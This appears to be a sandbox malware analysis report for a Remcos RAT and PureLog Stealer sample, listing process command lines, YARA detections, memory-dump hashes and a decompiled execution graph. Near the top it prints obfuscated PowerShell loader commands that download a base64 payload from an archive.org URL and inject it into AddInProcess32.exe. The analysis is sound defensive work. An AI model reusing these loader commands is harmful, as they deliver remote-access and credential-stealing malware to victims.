UuZScrJ3RzYXAvLzpzJysncCcrJ3QnKyd0aHswfScrJyAsIHswfWQnKydlJysnc2F0JysnaXZhZCcrJ28nKyd7MH0gJysnLCcrJyB7MH1kZXNhdCcrJ2knKyd2JysnYWQnKydvJysnezB9ICwnKycgeycrJzAnKyd9ZGVzYXRpdicrJ2EnKydkb3swJysnfSwnKyd7MH0nKydBZGRJblByb2MnKydlcycrJ3MnKyczJysnMnswfSx7MH0nKyd7MCcrJ30pKScpLWYgIFtjSEFyXTM5LFtjSEFyXTM2KSB8JiAoICRlTnY6Q09Nc1BFY1s0LDI0LDI1XS1qT2luJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                Imagebase:0x7ff741d30000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:3
                                                Start time:04:58:09
                                                Start date:26/09/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff75da10000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:false

                                                Target ID:5
                                                Start time:04:58:14
                                                Start date:26/09/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'1}'+'url '+'='+' {0}ht'+'tp'+'s'+'://ia6001'+'00'+'.us.'+'archive'+'.or'+'g'+'/24/'+'items/d'+'et'+'ah-'+'n'+'ot'+'e-'+'v/D'+'e'+'t'+'a'+'hN'+'oteV'+'.'+'t'+'x'+'t{0}'+';{'+'1'+'}base6'+'4'+'Co'+'ntent = (Ne'+'w'+'-Objec'+'t Syste'+'m.Net.'+'WebClie'+'nt).D'+'ow'+'nl'+'o'+'a'+'dStri'+'ng({1}u'+'rl);'+'{'+'1'+'}bin'+'aryCo'+'n'+'tent ='+' [Sy'+'st'+'em.'+'C'+'onvert'+']::'+'F'+'rom'+'B'+'a'+'se64'+'String({1}base64'+'Cont'+'en'+'t);{1'+'}as'+'se'+'mbly'+' ='+' [Refl'+'ect'+'io'+'n.'+'As'+'sembly'+']::Load'+'({1}'+'binar'+'yCon'+'tent);{1}ty'+'p'+'e '+'= {1}a'+'ss'+'embl'+'y'+'.'+'GetTyp'+'e({'+'0}Run'+'PE.Home{'+'0});'+'{'+'1}m'+'e'+'t'+'h'+'od = {1}typ'+'e.Ge'+'tMe'+'th'+'od({'+'0}VAI{0});{1'+'}met'+'ho'+'d'+'.I'+'nvoke({1'+'}nu'+'ll'+', [ob'+'jec'+'t['+']'+']'+'@'+'({'+'0}0/'+'Yjzb'+'t'+'/d/e'+'e.e'+'tsap//:s'+'p'+'t'+'th{0}'+' , {0}d'+'e'+'sat'+'ivad'+'o'+'{0} '+','+' {0}desat'+'i'+'v'+'ad'+'o'+'{0} ,'+' {'+'0'+'}desativ'+'a'+'do{0'+'},'+'{0}'+'AddInProc'+'es'+'s'+'3'+'2{0},{0}'+'{0'+'}))')-f [cHAr]39,[cHAr]36) |& ( $eNv:COMsPEc[4,24,25]-jOin'')"
                                                Imagebase:0x7ff741d30000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000002.1472944209.0000019CB5E90000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.1439903653.0000019CADA81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.1439903653.0000019CADA81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.1439903653.0000019CADA81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.1439903653.0000019CADA81000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.1439903653.0000019CAEAC4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.1439903653.0000019CAEAC4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.1439903653.0000019CAEAC4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.1439903653.0000019CAEAC4000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000002.1439903653.0000019CAE02B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:true

                                                Target ID:6
                                                Start time:04:58:21
                                                Start date:26/09/2024
                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                Imagebase:0x370000
                                                File size:43'008 bytes
                                                MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:7
                                                Start time:04:58:21
                                                Start date:26/09/2024
                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                Imagebase:0x720000
                                                File size:43'008 bytes
                                                MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.2589118650.000000000288F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.2588250443.0000000000C28000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                Reputation:moderate
                                                Has exited:false

                                                Reset < >
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.1511694674.00007FFAAC540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC540000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ffaac540000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                  • Instruction ID: 0465b6627564b679eea2d16790166412660d3e6802d0ca39c3d7308fb8aaec3e
                                                  • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                  • Instruction Fuzzy Hash: 4C01677115CB0D8FD744EF0CE451AA6B7E0FB95364F10056DE58AC3661DA36E882CB45
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.1511694674.00007FFAAC540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC540000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ffaac540000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (08$8,8$P/8$p08$-8$/8
                                                  • API String ID: 0-1391019473
                                                  • Opcode ID: ceba1269e613e49f0c822a5451b1077a070704c114f2b06e8b03d401116764e1
                                                  • Instruction ID: 9e2db4dcb2b78d054325e868d9b72c8776851bd690415f04f7240622cc8d4133
                                                  • Opcode Fuzzy Hash: ceba1269e613e49f0c822a5451b1077a070704c114f2b06e8b03d401116764e1
                                                  • Instruction Fuzzy Hash: 6E31B39798F7C28FF31697B899250A96FA5AF9321071C80FBE0CC8A49B9408DD0CC3D5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1482416186.00007FFAAC600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC600000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7ffaac600000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: H
                                                  • API String ID: 0-2852464175
                                                  • Opcode ID: 79acd555b32fcf3ce4fe2ae6595bd57625e5876cee8f0aa0c05d64ae5666a01d
                                                  • Instruction ID: 6cab5e17ac5abb784725425520950c508328e4b230507c95d319b48248168033
                                                  • Opcode Fuzzy Hash: 79acd555b32fcf3ce4fe2ae6595bd57625e5876cee8f0aa0c05d64ae5666a01d
                                                  • Instruction Fuzzy Hash: 24221362A0EB8A9FF7D7D76848655B47FE1EF57210B0890FAD04ED7193ED189C098381
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1478128582.00007FFAAC530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC530000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7ffaac530000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4f397e7299c34360afc24fb9f313e9e6de5dac9e0c4b3512861818576e6a0268
                                                  • Instruction ID: 5cfb7d8ec39eed7e0074cd108eaf0e5ea4e5ff50385e096b759d1e7b24289e00
                                                  • Opcode Fuzzy Hash: 4f397e7299c34360afc24fb9f313e9e6de5dac9e0c4b3512861818576e6a0268
                                                  • Instruction Fuzzy Hash: 1C91B6B1C8D68ECFFB95EB68C8556B97BE5FF16300F0841BAE04DD7192DE2498098781
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1482416186.00007FFAAC600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC600000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7ffaac600000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e5b711a8de2418a20f2c4a8f622492dd38af49360b31aa9f3505d6d5b801776a
                                                  • Instruction ID: e104d88cd4d323db1891bce92bd828def4ab636ed93a214d4efef76aecb9b52f
                                                  • Opcode Fuzzy Hash: e5b711a8de2418a20f2c4a8f622492dd38af49360b31aa9f3505d6d5b801776a
                                                  • Instruction Fuzzy Hash: 60612762A0FA869FF7DAD76858611B966C3EF86220B58E1BED04ED31D3DD18DC0943C1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1482416186.00007FFAAC600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC600000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7ffaac600000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1e1ac36085bbb23314812ca984525ece32b6726e6f56be3a5a157d432ae3d54c
                                                  • Instruction ID: 0ee7aeb7dd131672aaf9e4791dea87b7e97f973749b74d2a10972a79d2268e9f
                                                  • Opcode Fuzzy Hash: 1e1ac36085bbb23314812ca984525ece32b6726e6f56be3a5a157d432ae3d54c
                                                  • Instruction Fuzzy Hash: 1D510822A0DA899FF7D7CB1844655B47BE1EF56200B48E0FAD40ED7193DD18DC098380
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1482416186.00007FFAAC600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC600000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7ffaac600000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9f5c2f8b9b77a03ed4165bb65ccd5b832febad5b07d38903fa26c11bcbc3c9ef
                                                  • Instruction ID: fbdd6258494478bc036f26c8014d04395e2d9fb63e0097b9df6f8e7481cde5dd
                                                  • Opcode Fuzzy Hash: 9f5c2f8b9b77a03ed4165bb65ccd5b832febad5b07d38903fa26c11bcbc3c9ef
                                                  • Instruction Fuzzy Hash: 0141F452E0FA879FF7E7D72818651B866C3EF86220B58E1B9D44ED31E3DD18DC094281
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1478128582.00007FFAAC530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC530000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7ffaac530000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 40f4a97f142c92ebf164cf47132b12179f0f84e00877fd647893e6bbe29a2eed
                                                  • Instruction ID: 9e5cee3c3b0b371facca825a615f0cde400875095116ed2e5ee78d36a2892186
                                                  • Opcode Fuzzy Hash: 40f4a97f142c92ebf164cf47132b12179f0f84e00877fd647893e6bbe29a2eed
                                                  • Instruction Fuzzy Hash: 3101677115CB0C8FD784EF0CE451AA5B7E0FB95364F10056DE58AC36A1DB36E881CB46
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1482416186.00007FFAAC600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC600000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7ffaac600000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: P*%
                                                  • API String ID: 0-3618974321
                                                  • Opcode ID: 6a16808444015d24781fb922af0174c8d29f0fa455e1c604578fec06198e5ae5
                                                  • Instruction ID: 9e2948b6cf7e60857b6aed9a464dc61c957bc47cddb6df093f2dc3b1813340f3
                                                  • Opcode Fuzzy Hash: 6a16808444015d24781fb922af0174c8d29f0fa455e1c604578fec06198e5ae5
                                                  • Instruction Fuzzy Hash: 5A720562A0EB899FE796D72898555B47FD1EF87221B0891FFD04EC7193DD189C0A83C1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1478128582.00007FFAAC530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC530000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7ffaac530000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b2545a49789bbbf7a6eab99ee0627208a1f442a838d80039fff13ef715a50271
                                                  • Instruction ID: 1ead57fd0beef8d64fe13c64f6c4d046d147c449ce461c7e32a3680190326c14
                                                  • Opcode Fuzzy Hash: b2545a49789bbbf7a6eab99ee0627208a1f442a838d80039fff13ef715a50271
                                                  • Instruction Fuzzy Hash: 955122A288E7C24FE7038B708C755947FB0AF13214B4E45EBD4D4CB0E3E6595A5AC362
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1478128582.00007FFAAC530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC530000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7ffaac530000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (08$8,8$H18$P/8$p08$-8$/8
                                                  • API String ID: 0-1267371562
                                                  • Opcode ID: 878dd783556bc5a8bcbd53560a7acceecc2e209264fd30c9d9af298b8ab309de
                                                  • Instruction ID: 75c9249ed8e9b4cabd8ad9111a527aa6fcf86024299c1c7749de5dc945c5745f
                                                  • Opcode Fuzzy Hash: 878dd783556bc5a8bcbd53560a7acceecc2e209264fd30c9d9af298b8ab309de
                                                  • Instruction Fuzzy Hash: D9719F8394FBC38FF3565BB808291656FD4EFA3640B1880BBF0C84A69B9919D909C3D5

                                                  Execution Graph

                                                  Execution Coverage:4%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:5.4%
                                                  Total number of Nodes:1261
                                                  Total number of Limit Nodes:37
                                                  execution_graph 47282 43bea8 47283 43beb4 _swprintf ___BuildCatchObject 47282->47283 47284 43bec2 47283->47284 47286 43beec 47283->47286 47298 44062d 20 API calls __dosmaperr 47284->47298 47293 445909 EnterCriticalSection 47286->47293 47288 43bec7 ___BuildCatchObject ___std_exception_copy 47289 43bef7 47294 43bf98 47289->47294 47293->47289 47296 43bfa6 47294->47296 47295 43bf02 47299 43bf1f LeaveCriticalSection std::_Lockit::~_Lockit 47295->47299 47296->47295 47300 4497ec 37 API calls 2 library calls 47296->47300 47298->47288 47299->47288 47300->47296 47301 434918 47302 434924 ___BuildCatchObject 47301->47302 47328 434627 47302->47328 47304 43492b 47306 434954 47304->47306 47626 434a8a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 47304->47626 47314 434993 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 47306->47314 47627 4442d2 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 47306->47627 47308 43496d 47309 434973 ___BuildCatchObject 47308->47309 47628 444276 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 47308->47628 47311 4349f3 47339 434ba5 47311->47339 47314->47311 47629 443487 36 API calls 6 library calls 47314->47629 47321 434a15 47322 434a1f 47321->47322 47631 4434bf 28 API calls _Atexit 47321->47631 47324 434a28 47322->47324 47632 443462 28 API calls _Atexit 47322->47632 47633 43479e 13 API calls 2 library calls 47324->47633 47327 434a30 47327->47309 47329 434630 47328->47329 47634 434cb6 IsProcessorFeaturePresent 47329->47634 47331 43463c 47635 438fb1 10 API calls 4 library calls 47331->47635 47333 434641 47338 434645 47333->47338 47636 44415f 47333->47636 47336 43465c 47336->47304 47338->47304 47702 436f10 47339->47702 47342 4349f9 47343 444223 47342->47343 47704 44f0d9 47343->47704 47345 44422c 47346 434a02 47345->47346 47708 446895 36 API calls 47345->47708 47348 40ea00 47346->47348 47710 41cbe1 LoadLibraryA GetProcAddress 47348->47710 47350 40ea1c GetModuleFileNameW 47715 40f3fe 47350->47715 47352 40ea38 47730 4020f6 47352->47730 47355 4020f6 28 API calls 47356 40ea56 47355->47356 47736 41beac 47356->47736 47360 40ea68 47762 401e8d 47360->47762 47362 40ea71 47363 40ea84 47362->47363 47364 40eace 47362->47364 48025 40fbee 118 API calls 47363->48025 47768 401e65 47364->47768 47367 40ea96 47369 401e65 22 API calls 47367->47369 47368 40eade 47371 401e65 22 API calls 47368->47371 47370 40eaa2 47369->47370 48026 410f72 36 API calls __EH_prolog 47370->48026 47372 40eafd 47371->47372 47773 40531e 47372->47773 47375 40eb0c 47778 406383 47375->47778 47376 40eab4 48027 40fb9f 78 API calls 47376->48027 47380 40eabd 48028 40f3eb 71 API calls 47380->48028 47386 401fd8 11 API calls 47388 40ef36 47386->47388 47387 401fd8 11 API calls 47389 40eb36 47387->47389 47630 443396 GetModuleHandleW 47388->47630 47390 401e65 22 API calls 47389->47390 47391 40eb3f 47390->47391 47795 401fc0 47391->47795 47393 40eb4a 47394 401e65 22 API calls 47393->47394 47395 40eb63 47394->47395 47396 401e65 22 API calls 47395->47396 47397 40eb7e 47396->47397 47398 40ebe9 47397->47398 48029 406c59 47397->48029 47399 401e65 22 API calls 47398->47399 47405 40ebf6 47399->47405 47401 40ebab 47402 401fe2 28 API calls 47401->47402 47403 40ebb7 47402->47403 47404 401fd8 11 API calls 47403->47404 47407 40ebc0 47404->47407 47406 40ec3d 47405->47406 47411 413584 3 API calls 47405->47411 47799 40d0a4 47406->47799 48034 413584 RegOpenKeyExA 47407->48034 47409 40ec43 47410 40eac6 47409->47410 47802 41b354 47409->47802 47410->47386 47417 40ec21 47411->47417 47415 40f38a 48117 4139e4 30 API calls 47415->48117 47416 40ec5e 47418 40ecb1 47416->47418 47819 407751 47416->47819 47417->47406 48037 4139e4 30 API calls 47417->48037 47420 401e65 22 API calls 47418->47420 47423 40ecba 47420->47423 47432 40ecc6 47423->47432 47433 40eccb 47423->47433 47425 40f3a0 48118 4124b0 65 API calls ___scrt_fastfail 47425->48118 47426 40ec87 47430 401e65 22 API calls 47426->47430 47427 40ec7d 48038 407773 30 API calls 47427->48038 47441 40ec90 47430->47441 47431 40f3aa 47435 41bcef 28 API calls 47431->47435 48041 407790 CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 47432->48041 47438 401e65 22 API calls 47433->47438 47434 40ec82 48039 40729b 98 API calls 47434->48039 47439 40f3ba 47435->47439 47440 40ecd4 47438->47440 47928 413a5e RegOpenKeyExW 47439->47928 47823 41bcef 47440->47823 47441->47418 47446 40ecac 47441->47446 47444 40ecdf 47827 401f13 47444->47827 48040 40729b 98 API calls 47446->48040 47450 401f09 11 API calls 47452 40f3d7 47450->47452 47454 401f09 11 API calls 47452->47454 47456 40f3e0 47454->47456 47455 401e65 22 API calls 47457 40ecfc 47455->47457 47931 40dd7d 47456->47931 47461 401e65 22 API calls 47457->47461 47463 40ed16 47461->47463 47462 40f3ea 47464 401e65 22 API calls 47463->47464 47465 40ed30 47464->47465 47466 401e65 22 API calls 47465->47466 47467 40ed49 47466->47467 47468 40edb6 47467->47468 47469 401e65 22 API calls 47467->47469 47470 40edc5 47468->47470 47476 40ef41 ___scrt_fastfail 47468->47476 47474 40ed5e _wcslen 47469->47474 47471 40edce 47470->47471 47499 40ee4a ___scrt_fastfail 47470->47499 47472 401e65 22 API calls 47471->47472 47473 40edd7 47472->47473 47475 401e65 22 API calls 47473->47475 47474->47468 47478 401e65 22 API calls 47474->47478 47477 40ede9 47475->47477 48102 413733 RegOpenKeyExA 47476->48102 47481 401e65 22 API calls 47477->47481 47479 40ed79 47478->47479 47482 401e65 22 API calls 47479->47482 47483 40edfb 47481->47483 47484 40ed8e 47482->47484 47486 401e65 22 API calls 47483->47486 48042 40da6f 47484->48042 47485 40ef8c 47487 401e65 22 API calls 47485->47487 47489 40ee24 47486->47489 47490 40efb1 47487->47490 47495 401e65 22 API calls 47489->47495 47849 402093 47490->47849 47492 401f13 28 API calls 47494 40edad 47492->47494 47497 401f09 11 API calls 47494->47497 47498 40ee35 47495->47498 47496 40efc3 47855 4137aa RegCreateKeyA 47496->47855 47497->47468 48100 40ce34 45 API calls _wcslen 47498->48100 47839 413982 47499->47839 47503 40ee45 47503->47499 47505 40eede ctype 47508 401e65 22 API calls 47505->47508 47506 401e65 22 API calls 47507 40efe5 47506->47507 47861 43bb2c 47507->47861 47509 40eef5 47508->47509 47509->47485 47512 40ef09 47509->47512 47515 401e65 22 API calls 47512->47515 47513 40effc 48105 41ce2c 87 API calls ___scrt_fastfail 47513->48105 47514 40f01f 47519 402093 28 API calls 47514->47519 47516 40ef12 47515->47516 47520 41bcef 28 API calls 47516->47520 47518 40f003 CreateThread 47518->47514 48954 41d4ee 10 API calls 47518->48954 47521 40f034 47519->47521 47522 40ef1e 47520->47522 47523 402093 28 API calls 47521->47523 48101 40f4af 104 API calls 47522->48101 47525 40f043 47523->47525 47865 41b580 47525->47865 47526 40ef23 47526->47485 47528 40ef2a 47526->47528 47528->47410 47530 401e65 22 API calls 47531 40f054 47530->47531 47532 401e65 22 API calls 47531->47532 47533 40f066 47532->47533 47534 401e65 22 API calls 47533->47534 47535 40f086 47534->47535 47536 43bb2c _strftime 40 API calls 47535->47536 47537 40f093 47536->47537 47538 401e65 22 API calls 47537->47538 47539 40f09e 47538->47539 47540 401e65 22 API calls 47539->47540 47541 40f0af 47540->47541 47542 401e65 22 API calls 47541->47542 47543 40f0c4 47542->47543 47544 401e65 22 API calls 47543->47544 47545 40f0d5 47544->47545 47546 40f0dc StrToIntA 47545->47546 47889 409e1f 47546->47889 47549 401e65 22 API calls 47550 40f0f7 47549->47550 47551 40f103 47550->47551 47552 40f13c 47550->47552 48106 43455e 47551->48106 47555 401e65 22 API calls 47552->47555 47557 40f14c 47555->47557 47556 401e65 22 API calls 47558 40f11f 47556->47558 47560 40f194 47557->47560 47561 40f158 47557->47561 47559 40f126 CreateThread 47558->47559 47559->47552 48952 41a045 103 API calls 2 library calls 47559->48952 47562 401e65 22 API calls 47560->47562 47563 43455e new 22 API calls 47561->47563 47564 40f19d 47562->47564 47565 40f161 47563->47565 47568 40f207 47564->47568 47569 40f1a9 47564->47569 47566 401e65 22 API calls 47565->47566 47567 40f173 47566->47567 47570 40f17a CreateThread 47567->47570 47571 401e65 22 API calls 47568->47571 47572 401e65 22 API calls 47569->47572 47570->47560 48951 41a045 103 API calls 2 library calls 47570->48951 47573 40f210 47571->47573 47574 40f1b9 47572->47574 47575 40f255 47573->47575 47576 40f21c 47573->47576 47577 401e65 22 API calls 47574->47577 47914 41b69e GetComputerNameExW GetUserNameW 47575->47914 47579 401e65 22 API calls 47576->47579 47580 40f1ce 47577->47580 47582 40f225 47579->47582 48113 40da23 31 API calls 47580->48113 47586 401e65 22 API calls 47582->47586 47583 401f13 28 API calls 47585 40f269 47583->47585 47588 401f09 11 API calls 47585->47588 47589 40f23a 47586->47589 47587 40f1e1 47590 401f13 28 API calls 47587->47590 47591 40f272 47588->47591 47600 43bb2c _strftime 40 API calls 47589->47600 47592 40f1ed 47590->47592 47593 40f27b SetProcessDEPPolicy 47591->47593 47594 40f27e CreateThread 47591->47594 47597 401f09 11 API calls 47592->47597 47593->47594 47595 40f293 CreateThread 47594->47595 47596 40f29f 47594->47596 48923 40f7e2 47594->48923 47595->47596 48953 412132 138 API calls 47595->48953 47598 40f2b4 47596->47598 47599 40f2a8 CreateThread 47596->47599 47601 40f1f6 CreateThread 47597->47601 47603 40f307 47598->47603 47605 402093 28 API calls 47598->47605 47599->47598 48955 412716 38 API calls ___scrt_fastfail 47599->48955 47602 40f247 47600->47602 47601->47568 48950 401be9 50 API calls _strftime 47601->48950 48114 40c19d 7 API calls 47602->48114 47925 41353a RegOpenKeyExA 47603->47925 47606 40f2d7 47605->47606 48115 4052fd 28 API calls 47606->48115 47611 40f328 47613 41bcef 28 API calls 47611->47613 47615 40f338 47613->47615 48116 413656 31 API calls 47615->48116 47620 40f34e 47621 401f09 11 API calls 47620->47621 47624 40f359 47621->47624 47622 40f381 DeleteFileW 47623 40f388 47622->47623 47622->47624 47623->47431 47624->47431 47624->47622 47625 40f36f Sleep 47624->47625 47625->47624 47626->47304 47627->47308 47628->47314 47629->47311 47630->47321 47631->47322 47632->47324 47633->47327 47634->47331 47635->47333 47640 44fbe8 47636->47640 47639 438fda 8 API calls 3 library calls 47639->47338 47641 44fc05 47640->47641 47644 44fc01 47640->47644 47641->47644 47646 449d26 47641->47646 47643 43464e 47643->47336 47643->47639 47658 43502b 47644->47658 47647 449d32 ___BuildCatchObject 47646->47647 47665 445909 EnterCriticalSection 47647->47665 47649 449d39 47666 450203 47649->47666 47651 449d48 47652 449d57 47651->47652 47677 449bba 23 API calls 47651->47677 47679 449d73 LeaveCriticalSection std::_Lockit::~_Lockit 47652->47679 47655 449d68 ___BuildCatchObject 47655->47641 47656 449d52 47678 449c70 GetStdHandle GetFileType 47656->47678 47659 435036 IsProcessorFeaturePresent 47658->47659 47660 435034 47658->47660 47662 435078 47659->47662 47660->47643 47701 43503c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47662->47701 47664 43515b 47664->47643 47665->47649 47667 45020f ___BuildCatchObject 47666->47667 47668 450233 47667->47668 47669 45021c 47667->47669 